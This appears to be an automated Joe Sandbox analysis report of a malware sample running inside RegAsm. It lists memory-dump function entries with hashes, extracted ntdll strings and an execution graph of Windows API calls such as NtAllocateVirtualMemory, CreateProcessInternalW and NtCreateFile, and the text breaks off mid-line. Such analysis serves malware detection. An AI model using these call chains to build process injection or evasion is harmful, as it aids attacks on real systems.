                                • Source File: 00000004.00000002.1810032510.0000000002BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_2bf0000_RegAsm.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 15f21fe2e5c772f6f6b04076e86ef9afd25b1a1462c7228b52ae4caa798f8241
                                • Instruction ID: 6832c6c122f6f7c0f8c546ca9b10fbaa11e2c6a2e0077f25776f47f927568861
                                • Opcode Fuzzy Hash: 15f21fe2e5c772f6f6b04076e86ef9afd25b1a1462c7228b52ae4caa798f8241
                                • Instruction Fuzzy Hash: E390047134140C43D100715C440CF470005C7F0711F55C137F1134754DC715CD517531
                                Function 02C62DD0 Relevance: .0, Instructions: 4COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000004.00000002.1810032510.0000000002BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_2bf0000_RegAsm.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: e7c047bad3553f4f3a63d49ec6ae4663228055ebbbc858fd74637a06c34368f5
                                • Instruction ID: 0c555a20a0a497b2f16e0071974dfe1b7e7bcb3d059ab0e644937ca6daadeadb
                                • Opcode Fuzzy Hash: e7c047bad3553f4f3a63d49ec6ae4663228055ebbbc858fd74637a06c34368f5
                                • Instruction Fuzzy Hash: C8900261282441525545B1584408507400697E0651795C122A2414950C85269956E621
                                Function 02C62DB0 Relevance: .0, Instructions: 4COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000004.00000002.1810032510.0000000002BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_2bf0000_RegAsm.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 9801443584d78e5a22b2f3025938f0384a55bcf0bee84f54fb6e3c4057a47b00
                                • Instruction ID: 6d5975838c90de872bf9d8421ef22d25b3a1da9a82c9bd8db8107dd15b525353
                                • Opcode Fuzzy Hash: 9801443584d78e5a22b2f3025938f0384a55bcf0bee84f54fb6e3c4057a47b00
                                • Instruction Fuzzy Hash: 8290027128140402D14171584408607000997D0651F95C122A1424554E86558B56BA61
                                Function 02C63D70 Relevance: .0, Instructions: 4COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000004.00000002.1810032510.0000000002BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_2bf0000_RegAsm.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 4dd26260c8046fd5d7e375a2edf97f7dabdbd9931fb35743eb0251e907023112
                                • Instruction ID: 1e4313a7870325d49d9435005cd7108f2a7738e2e9e2791758787b9fc5451b20
                                • Opcode Fuzzy Hash: 4dd26260c8046fd5d7e375a2edf97f7dabdbd9931fb35743eb0251e907023112
                                • Instruction Fuzzy Hash: 4D90027524140402D51071585808647004687D0711F55D521A1424558D865489A1B121
                                Function 02C62D00 Relevance: .0, Instructions: 4COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000004.00000002.1810032510.0000000002BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_2bf0000_RegAsm.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 24f926d32c386ba67b1f7ee4a25b029ffe5c8a94dea6e79ad2e7ab55d058c250
                                • Instruction ID: 76169f09ed2f9ae3ae9ae2b9da7ad71e6aeef5264cd1f8360d971fd61a83cfe7
                                • Opcode Fuzzy Hash: 24f926d32c386ba67b1f7ee4a25b029ffe5c8a94dea6e79ad2e7ab55d058c250
                                • Instruction Fuzzy Hash: C690047134544443D100755C540CF070005C7D0715F55D131F30745D5DC735CD51F131
                                Function 02C62D10 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000004.00000002.1810032510.0000000002BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_2bf0000_RegAsm.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 360a534ef5cf73377378a96feebdc630ba87cfab1af244ad68ecadff5fd814de
                                • Instruction ID: f5616db193cc59acf725a8bf0e947a4525ccdaeb5159395cc5c86eca5bfbd0d6
                                • Opcode Fuzzy Hash: 360a534ef5cf73377378a96feebdc630ba87cfab1af244ad68ecadff5fd814de
                                • Instruction Fuzzy Hash: 4F90026925340002D1807158540C60B000587D1612F95D525A1015558CC91589696321
                                Function 02C63D10 Relevance: .0, Instructions: 4COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000004.00000002.1810032510.0000000002BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_2bf0000_RegAsm.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 2bb6f75e3d030f960cc245d300707b2e1c8f122fdcac0fd5457aa8bbd94e5e37
                                • Instruction ID: 6132457756faf54f87bf22297e1d1dcec28caaeeb00254ff3fc5010f70524aa7
                                • Opcode Fuzzy Hash: 2bb6f75e3d030f960cc245d300707b2e1c8f122fdcac0fd5457aa8bbd94e5e37
                                • Instruction Fuzzy Hash: 9690027124240142954072585808A4F410587E1712B95D525A1015554CC91489616221
                                Function 02C62D30 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000004.00000002.1810032510.0000000002BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_2bf0000_RegAsm.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: a4f003bf55301642cc9fd901e49073f84f73c4d89fa13617dec4de31b12491bb
                                • Instruction ID: f21595625b1ece077a1e55cb643becb45d0917ec09eca413c8d067bfc1dee933
                                • Opcode Fuzzy Hash: a4f003bf55301642cc9fd901e49073f84f73c4d89fa13617dec4de31b12491bb
                                • Instruction Fuzzy Hash: A190047134140003D140715C541C7074005D7F1711F55D131F1414554CDD15CD577333
                                Function 02C62C00 Relevance: .0, Instructions: 2COMMONLIBRARYCODE
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000004.00000002.1810032510.0000000002BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_2bf0000_RegAsm.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                • Instruction ID: 462833acf9ec6ed6f9c15f680635450faf1d0d854872d0a1c605a00dc32075d8
                                • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                • Instruction Fuzzy Hash:
                                Function 02C62890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.1810032510.0000000002BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_2bf0000_RegAsm.jbxd
                                Similarity
                                • API ID: ___swprintf_l
                                • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                • API String ID: 48624451-2108815105
                                • Opcode ID: 4bf5d63c382c3625244f2249892e85ea88033f54a4f6cdb0974c49bdda9106ad
                                • Instruction ID: 85a3b77fc4bdb44d91de7ab05d81cbc2ba7b94630aebdc013dd4e736338573c3
                                • Opcode Fuzzy Hash: 4bf5d63c382c3625244f2249892e85ea88033f54a4f6cdb0974c49bdda9106ad
                                • Instruction Fuzzy Hash: 2051E7B2A00516BFDF20DBA888C4A7EF7B8BF882047508169E865D7641E334DF00DBE1
                                Function 02C57630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                                Download Yara Rule
                                Strings
                                • ExecuteOptions, xrefs: 02C946A0
                                • Execute=1, xrefs: 02C94713
                                • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 02C946FC
                                • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 02C94725
                                • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 02C94742
                                • CLIENT(ntdll): Processing section info %ws..., xrefs: 02C94787
                                • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 02C94655
                                Memory Dump Source
                                • Source File: 00000004.00000002.1810032510.0000000002BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_2bf0000_RegAsm.jbxd
                                Similarity
                                • API ID:
                                • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                • API String ID: 0-484625025
                                • Opcode ID: b7f569e3bde8b4ff86989042772c9babc075289fff1bd428c0009cf87c9e570c
                                • Instruction ID: 96ccca35e5ee68314fb7aa353944df590a224a260fa78d5fa29a986ce1357504
                                • Opcode Fuzzy Hash: b7f569e3bde8b4ff86989042772c9babc075289fff1bd428c0009cf87c9e570c
                                • Instruction Fuzzy Hash: 5A51F931600229BAEF219BA5EC99BB9B7FDAF44304F0400A9D905A7180DB71DAC9DF55
                                Function 02C6B5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.1810032510.0000000002BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_2bf0000_RegAsm.jbxd
                                Similarity
                                • API ID: __aulldvrm
                                • String ID: +$-$0$0
                                • API String ID: 1302938615-699404926
                                • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                • Instruction ID: 82db24769bfe020105d6c1072ec40dbd07943c50a303ccecfcf1868cf5eb6857
                                • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                • Instruction Fuzzy Hash: 9381B170E4524A9EDF288E68C8D97FEBBB2AF8531CF184159D851F7291C7349E41CB60
                                Function 02C4F5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                                Download Yara Rule
                                Strings
                                • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 02C902E7
                                • RTL: Re-Waiting, xrefs: 02C9031E
                                • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 02C902BD
                                Memory Dump Source
                                • Source File: 00000004.00000002.1810032510.0000000002BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_2bf0000_RegAsm.jbxd
                                Similarity
                                • API ID:
                                • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                • API String ID: 0-2474120054
                                • Opcode ID: b49ca49c6cb7ed64440c04546a926076d89e61fd912b2ed8c4c4e93a8eaa11be
                                • Instruction ID: 06d67a063ece37e8a4c356b3c9dd6d3f81e10fdc775cd6f43ae99a1f5e7f25c8
                                • Opcode Fuzzy Hash: b49ca49c6cb7ed64440c04546a926076d89e61fd912b2ed8c4c4e93a8eaa11be
                                • Instruction Fuzzy Hash: B1E1BE30608741DFDB25CF28C888B6AB7E1BF85318F140A6DF5A58B6E1DB74DA45CB42
                                Function 02C5BED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON
                                Download Yara Rule
                                Strings
                                • RTL: Resource at %p, xrefs: 02C97B8E
                                • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 02C97B7F
                                • RTL: Re-Waiting, xrefs: 02C97BAC
                                Memory Dump Source
                                • Source File: 00000004.00000002.1810032510.0000000002BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_2bf0000_RegAsm.jbxd
                                Similarity
                                • API ID:
                                • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                • API String ID: 0-871070163
                                • Opcode ID: ffe463a02a036c026ca003d2fb19048c6bf059f0a868156a79dca91f84cc19d4
                                • Instruction ID: fb77ab3941ae1a60f58cbf5d8530031815b22a05cb44b7a9ff809b078e89ec81
                                • Opcode Fuzzy Hash: ffe463a02a036c026ca003d2fb19048c6bf059f0a868156a79dca91f84cc19d4
                                • Instruction Fuzzy Hash: CA41F4353057029FDB20CE25C840B6ABBE5EF88714F100A2DF95AD7680DB72E945CF95
                                Function 02C5B4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                                Download Yara Rule
                                APIs
                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 02C9728C
                                Strings
                                • RTL: Resource at %p, xrefs: 02C972A3
                                • RTL: Re-Waiting, xrefs: 02C972C1
                                • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 02C97294
                                Memory Dump Source
                                • Source File: 00000004.00000002.1810032510.0000000002BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_2bf0000_RegAsm.jbxd
                                Similarity
                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                • API String ID: 885266447-605551621
                                • Opcode ID: 5da5595626f8e2b951b384901c9e9ec19f4fb04e9f078ee02180ec386aacf7b0
                                • Instruction ID: b8f4cf5eb21777e358f3336924889e29eaa571c995878fb3b7e7b706ce12c13e
                                • Opcode Fuzzy Hash: 5da5595626f8e2b951b384901c9e9ec19f4fb04e9f078ee02180ec386aacf7b0
                                • Instruction Fuzzy Hash: 2C413271711612ABDB20CE25CC85B66B7A5FF84718F100618FD55EB280DB31E896CBD1
                                Function 02C29126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.1810032510.0000000002BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_2bf0000_RegAsm.jbxd
                                Similarity
                                • API ID:
                                • String ID: $$@
                                • API String ID: 0-1194432280
                                • Opcode ID: ab89e87e7996c26e8080533a0ae98eb3f6a95cbb7438d0cf2ceccb2d96d10bae
                                • Instruction ID: 6c119f55079e94fc3bc772e0bcfa662e4b67cd132a649d98670030b719368874
                                • Opcode Fuzzy Hash: ab89e87e7996c26e8080533a0ae98eb3f6a95cbb7438d0cf2ceccb2d96d10bae
                                • Instruction Fuzzy Hash: A2814B75D402799BDB21DB54CC48BEEB7B8AF48714F0041EAEA09B7240D7309E85CFA1

                                Execution Graph

                                Execution Coverage:3.1%
                                Dynamic/Decrypted Code Coverage:4.1%
                                Signature Coverage:2.2%
                                Total number of Nodes:458
                                Total number of Limit Nodes:75
                                execution_graph 78153 2c09ec0 78155 2c0a20a 78153->78155 78156 2c0a6a6 78155->78156 78157 2c2b6d0 78155->78157 78158 2c2b6f3 78157->78158 78163 2c04110 78158->78163 78160 2c2b6ff 78161 2c2b73b 78160->78161 78166 2c25b10 78160->78166 78161->78156 78165 2c0411d 78163->78165 78170 2c13780 78163->78170 78165->78160 78167 2c25b72 78166->78167 78169 2c25b7f 78167->78169 78194 2c11f70 78167->78194 78169->78161 78172 2c1379d 78170->78172 78171 2c137b6 78171->78165 78172->78171 78174 2c2a400 78172->78174 78176 2c2a41a 78174->78176 78175 2c2a449 78175->78171 78176->78175 78181 2c29010 78176->78181 78182 2c2902a 78181->78182 78188 33b2c0a 78182->78188 78183 2c29056 78185 2c2ba60 78183->78185 78191 2c29d20 78185->78191 78187 2c2a4c2 78187->78171 78189 33b2c1f LdrInitializeThunk 78188->78189 78190 33b2c11 78188->78190 78189->78183 78190->78183 78192 2c29d3a 78191->78192 78193 2c29d4b RtlFreeHeap 78192->78193 78193->78187 78195 2c11fa8 78194->78195 78210 2c18400 78195->78210 78197 2c11fb0 78198 2c12286 78197->78198 78221 2c2bb40 78197->78221 78198->78169 78200 2c11fc6 78201 2c2bb40 RtlAllocateHeap 78200->78201 78202 2c11fd7 78201->78202 78203 2c2bb40 RtlAllocateHeap 78202->78203 78204 2c11fe8 78203->78204 78209 2c1207c 78204->78209 78232 2c16fb0 NtClose LdrInitializeThunk LdrInitializeThunk LdrInitializeThunk 78204->78232 78207 2c12232 78228 2c28450 78207->78228 78224 2c14ad0 78209->78224 78211 2c1842c 78210->78211 78233 2c182f0 78211->78233 78214 2c18471 78217 2c1848d 78214->78217 78219 2c299b0 NtClose 78214->78219 78215 2c18459 78216 2c18464 78215->78216 78239 2c299b0 78215->78239 78216->78197 78217->78197 78220 2c18483 78219->78220 78220->78197 78247 2c29cd0 78221->78247 78223 2c2bb5b 78223->78200 78225 2c14adc 78224->78225 78226 2c14b30 LdrLoadDll 78225->78226 78227 2c14afb 78225->78227 78226->78227 78227->78207 78229 2c284b2 78228->78229 78231 2c284bf 78229->78231 78250 2c122a0 78229->78250 78231->78198 78232->78209 78234 2c1830a 78233->78234 78238 2c183e6 78233->78238 78242 2c290b0 78234->78242 78237 2c299b0 NtClose 78237->78238 78238->78214 78238->78215 78240 2c299ca 78239->78240 78241 2c299db NtClose 78240->78241 78241->78216 78243 2c290ca 78242->78243 78246 33b35c0 LdrInitializeThunk 78243->78246 78244 2c183da 78244->78237 78246->78244 78248 2c29cea 78247->78248 78249 2c29cfb RtlAllocateHeap 78248->78249 78249->78223 78271 2c186d0 78250->78271 78252 2c12812 78252->78231 78253 2c122c0 78253->78252 78275 2c21630 78253->78275 78256 2c124da 78283 2c2cc30 78256->78283 78258 2c1231e 78258->78252 78278 2c2cb00 78258->78278 78260 2c25d80 3 API calls 78265 2c1253c 78260->78265 78261 2c124ef 78263 2c12686 78261->78263 78261->78265 78289 2c25ba0 78261->78289 78293 2c10dc0 78263->78293 78265->78252 78265->78260 78266 2c25ba0 2 API calls 78265->78266 78267 2c10dc0 LdrInitializeThunk 78265->78267 78300 2c18670 78265->78300 78266->78265 78267->78265 78269 2c12690 78269->78265 78270 2c18670 LdrInitializeThunk 78269->78270 78296 2c25d80 78269->78296 78270->78269 78272 2c186dd 78271->78272 78273 2c18702 78272->78273 78274 2c186fb SetErrorMode 78272->78274 78273->78253 78274->78273 78304 2c2b9d0 78275->78304 78277 2c21651 78277->78258 78279 2c2cb10 78278->78279 78280 2c2cb16 78278->78280 78279->78256 78281 2c2bb40 RtlAllocateHeap 78280->78281 78282 2c2cb3c 78281->78282 78282->78256 78284 2c2cba0 78283->78284 78285 2c2bb40 RtlAllocateHeap 78284->78285 78286 2c2cbfd 78284->78286 78287 2c2cbda 78285->78287 78286->78261 78288 2c2ba60 RtlFreeHeap 78287->78288 78288->78286 78290 2c25c02 78289->78290 78291 2c25c23 78290->78291 78311 2c161d0 78290->78311 78291->78261 78328 2c29c30 78293->78328 78297 2c25de2 78296->78297 78299 2c25df3 78297->78299 78333 2c17e20 78297->78333 78299->78269 78301 2c18683 78300->78301 78340 2c28f10 78301->78340 78303 2c186ae 78303->78265 78307 2c29b10 78304->78307 78306 2c2ba01 78306->78277 78308 2c29b9f 78307->78308 78310 2c29b35 78307->78310 78309 2c29bb5 NtAllocateVirtualMemory 78308->78309 78309->78306 78310->78306 78312 2c16176 78311->78312 78314 2c1619c 78311->78314 78312->78314 78315 2c185f0 78312->78315 78314->78291 78316 2c18634 78315->78316 78317 2c18655 78316->78317 78322 2c28ce0 78316->78322 78317->78312 78319 2c18645 78320 2c18661 78319->78320 78321 2c299b0 NtClose 78319->78321 78320->78312 78321->78317 78323 2c28d57 78322->78323 78324 2c28d05 78322->78324 78327 33b4650 LdrInitializeThunk 78323->78327 78324->78319 78325 2c28d7c 78325->78319 78327->78325 78329 2c29c4d 78328->78329 78332 33b2c70 LdrInitializeThunk 78329->78332 78330 2c10de2 78330->78269 78332->78330 78338 2c17d50 78333->78338 78334 2c17e04 78335 2c10dc0 LdrInitializeThunk 78334->78335 78336 2c17e0e 78335->78336 78336->78299 78337 2c17e46 78337->78299 78338->78334 78338->78337 78339 2c25ba0 2 API calls 78338->78339 78339->78338 78341 2c28f8b 78340->78341 78343 2c28f38 78340->78343 78345 33b2dd0 LdrInitializeThunk 78341->78345 78342 2c28fb0 78342->78303 78343->78303 78345->78342 78346 2c176c0 78347 2c176dc 78346->78347 78355 2c17729 78346->78355 78349 2c299b0 NtClose 78347->78349 78347->78355 78348 2c17858 78350 2c176f4 78349->78350 78356 2c16ae0 NtClose LdrInitializeThunk LdrInitializeThunk 78350->78356 78352 2c17835 78352->78348 78358 2c16cb0 NtClose LdrInitializeThunk LdrInitializeThunk 78352->78358 78355->78348 78357 2c16ae0 NtClose LdrInitializeThunk LdrInitializeThunk 78355->78357 78356->78355 78357->78352 78358->78348 78359 2c16140 78360 2c18670 LdrInitializeThunk 78359->78360 78361 2c16170 78360->78361 78362 2c185f0 2 API calls 78361->78362 78363 2c1619c 78361->78363 78362->78361 78364 2c296c0 78365 2c29771 78364->78365 78367 2c296e9 78364->78367 78366 2c29787 NtCreateFile 78365->78366 78368 2c28e40 78369 2c28ecc 78368->78369 78370 2c28e68 78368->78370 78373 33b2ee0 LdrInitializeThunk 78369->78373 78371 2c28efd 78373->78371 78374 2c28fc0 78375 2c28fdd 78374->78375 78378 33b2df0 LdrInitializeThunk 78375->78378 78376 2c29005 78378->78376 78495 2c26580 78496 2c265da 78495->78496 78498 2c265e7 78496->78498 78499 2c23f70 78496->78499 78500 2c2b9d0 NtAllocateVirtualMemory 78499->78500 78501 2c23fb1 78500->78501 78502 2c14ad0 LdrLoadDll 78501->78502 78504 2c240be 78501->78504 78505 2c23ff7 78502->78505 78503 2c24040 Sleep 78503->78505 78504->78498 78505->78503 78505->78504 78506 2c18d87 78507 2c18d8a 78506->78507 78508 2c18d41 78507->78508 78510 2c17640 78507->78510 78511 2c17656 78510->78511 78513 2c1768f 78510->78513 78511->78513 78514 2c174b0 LdrLoadDll 78511->78514 78513->78508 78514->78513 78516 2c1368c 78517 2c182f0 2 API calls 78516->78517 78518 2c1369c 78517->78518 78519 2c136b8 78518->78519 78520 2c299b0 NtClose 78518->78520 78520->78519 78521 2c17890 78522 2c178a8 78521->78522 78524 2c17902 78521->78524 78522->78524 78525 2c1b7b0 78522->78525 78526 2c1b7d6 78525->78526 78527 2c1ba06 78526->78527 78552 2c29db0 78526->78552 78527->78524 78529 2c1b849 78529->78527 78530 2c2cc30 2 API calls 78529->78530 78531 2c1b868 78530->78531 78531->78527 78532 2c1b93f 78531->78532 78533 2c29010 LdrInitializeThunk 78531->78533 78534 2c160c0 LdrInitializeThunk 78532->78534 78540 2c1b95e 78532->78540 78535 2c1b8ca 78533->78535 78534->78540 78535->78532 78537 2c1b8d3 78535->78537 78536 2c18670 LdrInitializeThunk 78541 2c1b935 78536->78541 78537->78527 78538 2c1b905 78537->78538 78546 2c1b927 78537->78546 78555 2c160c0 78537->78555 78574 2c24c80 LdrInitializeThunk 78538->78574 78539 2c1b9ee 78542 2c18670 LdrInitializeThunk 78539->78542 78540->78539 78559 2c28b80 78540->78559 78541->78524 78547 2c1b9fc 78542->78547 78546->78536 78547->78524 78548 2c1b9c5 78564 2c28c30 78548->78564 78550 2c1b9df 78569 2c28d90 78550->78569 78553 2c29dca 78552->78553 78554 2c29ddb CreateProcessInternalW 78553->78554 78554->78529 78556 2c160cd 78555->78556 78575 2c291e0 78556->78575 78558 2c160fe 78558->78538 78560 2c28ba5 78559->78560 78561 2c28bf7 78559->78561 78560->78548 78581 33b39b0 LdrInitializeThunk 78561->78581 78562 2c28c1c 78562->78548 78565 2c28caa 78564->78565 78567 2c28c58 78564->78567 78582 33b4340 LdrInitializeThunk 78565->78582 78566 2c28ccf 78566->78550 78567->78550 78570 2c28e0a 78569->78570 78571 2c28db8 78569->78571 78583 33b2fb0 LdrInitializeThunk 78570->78583 78571->78539 78572 2c28e2f 78572->78539 78574->78546 78576 2c2928e 78575->78576 78578 2c2920c 78575->78578 78580 33b2d10 LdrInitializeThunk 78576->78580 78577 2c292d3 78577->78558 78578->78558 78580->78577 78581->78562 78582->78566 78583->78572 78584 2c28910 78585 2c2892a 78584->78585 78586 2c2893b RtlDosPathNameToNtPathName_U 78585->78586 78587 2c29910 78588 2c29984 78587->78588 78590 2c29938 78587->78590 78589 2c2999a NtDeleteFile 78588->78589 78384 2c09e60 78386 2c09e6f 78384->78386 78385 2c09ead 78386->78385 78387 2c09e9a CreateThread 78386->78387 78593 2c0baa0 78594 2c2b9d0 NtAllocateVirtualMemory 78593->78594 78595 2c0d111 78593->78595 78594->78595 78388 2c1fd60 78389 2c1fdc4 78388->78389 78417 2c16850 78389->78417 78391 2c1fefe 78392 2c1fef7 78392->78391 78424 2c16960 78392->78424 78394 2c200a3 78395 2c1ff7a 78395->78394 78396 2c200b2 78395->78396 78428 2c1fb40 78395->78428 78397 2c299b0 NtClose 78396->78397 78399 2c200bc 78397->78399 78400 2c1ffb6 78400->78396 78401 2c1ffc1 78400->78401 78402 2c2bb40 RtlAllocateHeap 78401->78402 78403 2c1ffea 78402->78403 78404 2c1fff3 78403->78404 78405 2c20009 78403->78405 78406 2c299b0 NtClose 78404->78406 78437 2c1fa30 CoInitialize 78405->78437 78408 2c1fffd 78406->78408 78409 2c20017 78440 2c29490 78409->78440 78411 2c20092 78412 2c299b0 NtClose 78411->78412 78413 2c2009c 78412->78413 78414 2c2ba60 RtlFreeHeap 78413->78414 78414->78394 78415 2c20035 78415->78411 78416 2c29490 LdrInitializeThunk 78415->78416 78416->78415 78419 2c16883 78417->78419 78418 2c168a7 78418->78392 78419->78418 78444 2c29530 78419->78444 78421 2c168ca 78421->78418 78422 2c299b0 NtClose 78421->78422 78423 2c1694a 78422->78423 78423->78392 78425 2c16985 78424->78425 78449 2c29320 78425->78449 78429 2c1fb5c 78428->78429 78430 2c14ad0 LdrLoadDll 78429->78430 78432 2c1fb7a 78430->78432 78431 2c1fb83 78431->78400 78432->78431 78433 2c14ad0 LdrLoadDll 78432->78433 78434 2c1fc4e 78433->78434 78435 2c14ad0 LdrLoadDll 78434->78435 78436 2c1fcab 78434->78436 78435->78436 78436->78400 78439 2c1fa95 78437->78439 78438 2c1fb2b CoUninitialize 78438->78409 78439->78438 78441 2c294aa 78440->78441 78454 33b2ba0 LdrInitializeThunk 78441->78454 78442 2c294da 78442->78415 78445 2c2954d 78444->78445 78448 33b2ca0 LdrInitializeThunk 78445->78448 78446 2c29579 78446->78421 78448->78446 78450 2c2933d 78449->78450 78453 33b2c60 LdrInitializeThunk 78450->78453 78451 2c169f9 78451->78395 78453->78451 78454->78442 78596 2c1b2a0 78601 2c1afb0 78596->78601 78598 2c1b2ad 78615 2c1ac20 78598->78615 78600 2c1b2c3 78602 2c1afd5 78601->78602 78626 2c188e0 78602->78626 78605 2c1b123 78605->78598 78607 2c1b13a 78607->78598 78608 2c1b131 78608->78607 78610 2c1b227 78608->78610 78645 2c1a670 78608->78645 78612 2c1b28a 78610->78612 78654 2c1a9e0 78610->78654 78613 2c2ba60 RtlFreeHeap 78612->78613 78614 2c1b291 78613->78614 78614->78598 78616 2c1ac36 78615->78616 78619 2c1ac41 78615->78619 78617 2c2bb40 RtlAllocateHeap 78616->78617 78617->78619 78618 2c1ac65 78618->78600 78619->78618 78620 2c188e0 GetFileAttributesW 78619->78620 78621 2c1af82 78619->78621 78624 2c1a670 RtlFreeHeap 78619->78624 78625 2c1a9e0 RtlFreeHeap 78619->78625 78620->78619 78622 2c1af9b 78621->78622 78623 2c2ba60 RtlFreeHeap 78621->78623 78622->78600 78623->78622 78624->78619 78625->78619 78627 2c188fe 78626->78627 78628 2c18905 GetFileAttributesW 78627->78628 78629 2c18910 78627->78629 78628->78629 78629->78605 78630 2c23840 78629->78630 78631 2c2384e 78630->78631 78632 2c23855 78630->78632 78631->78608 78633 2c14ad0 LdrLoadDll 78632->78633 78634 2c2388a 78633->78634 78635 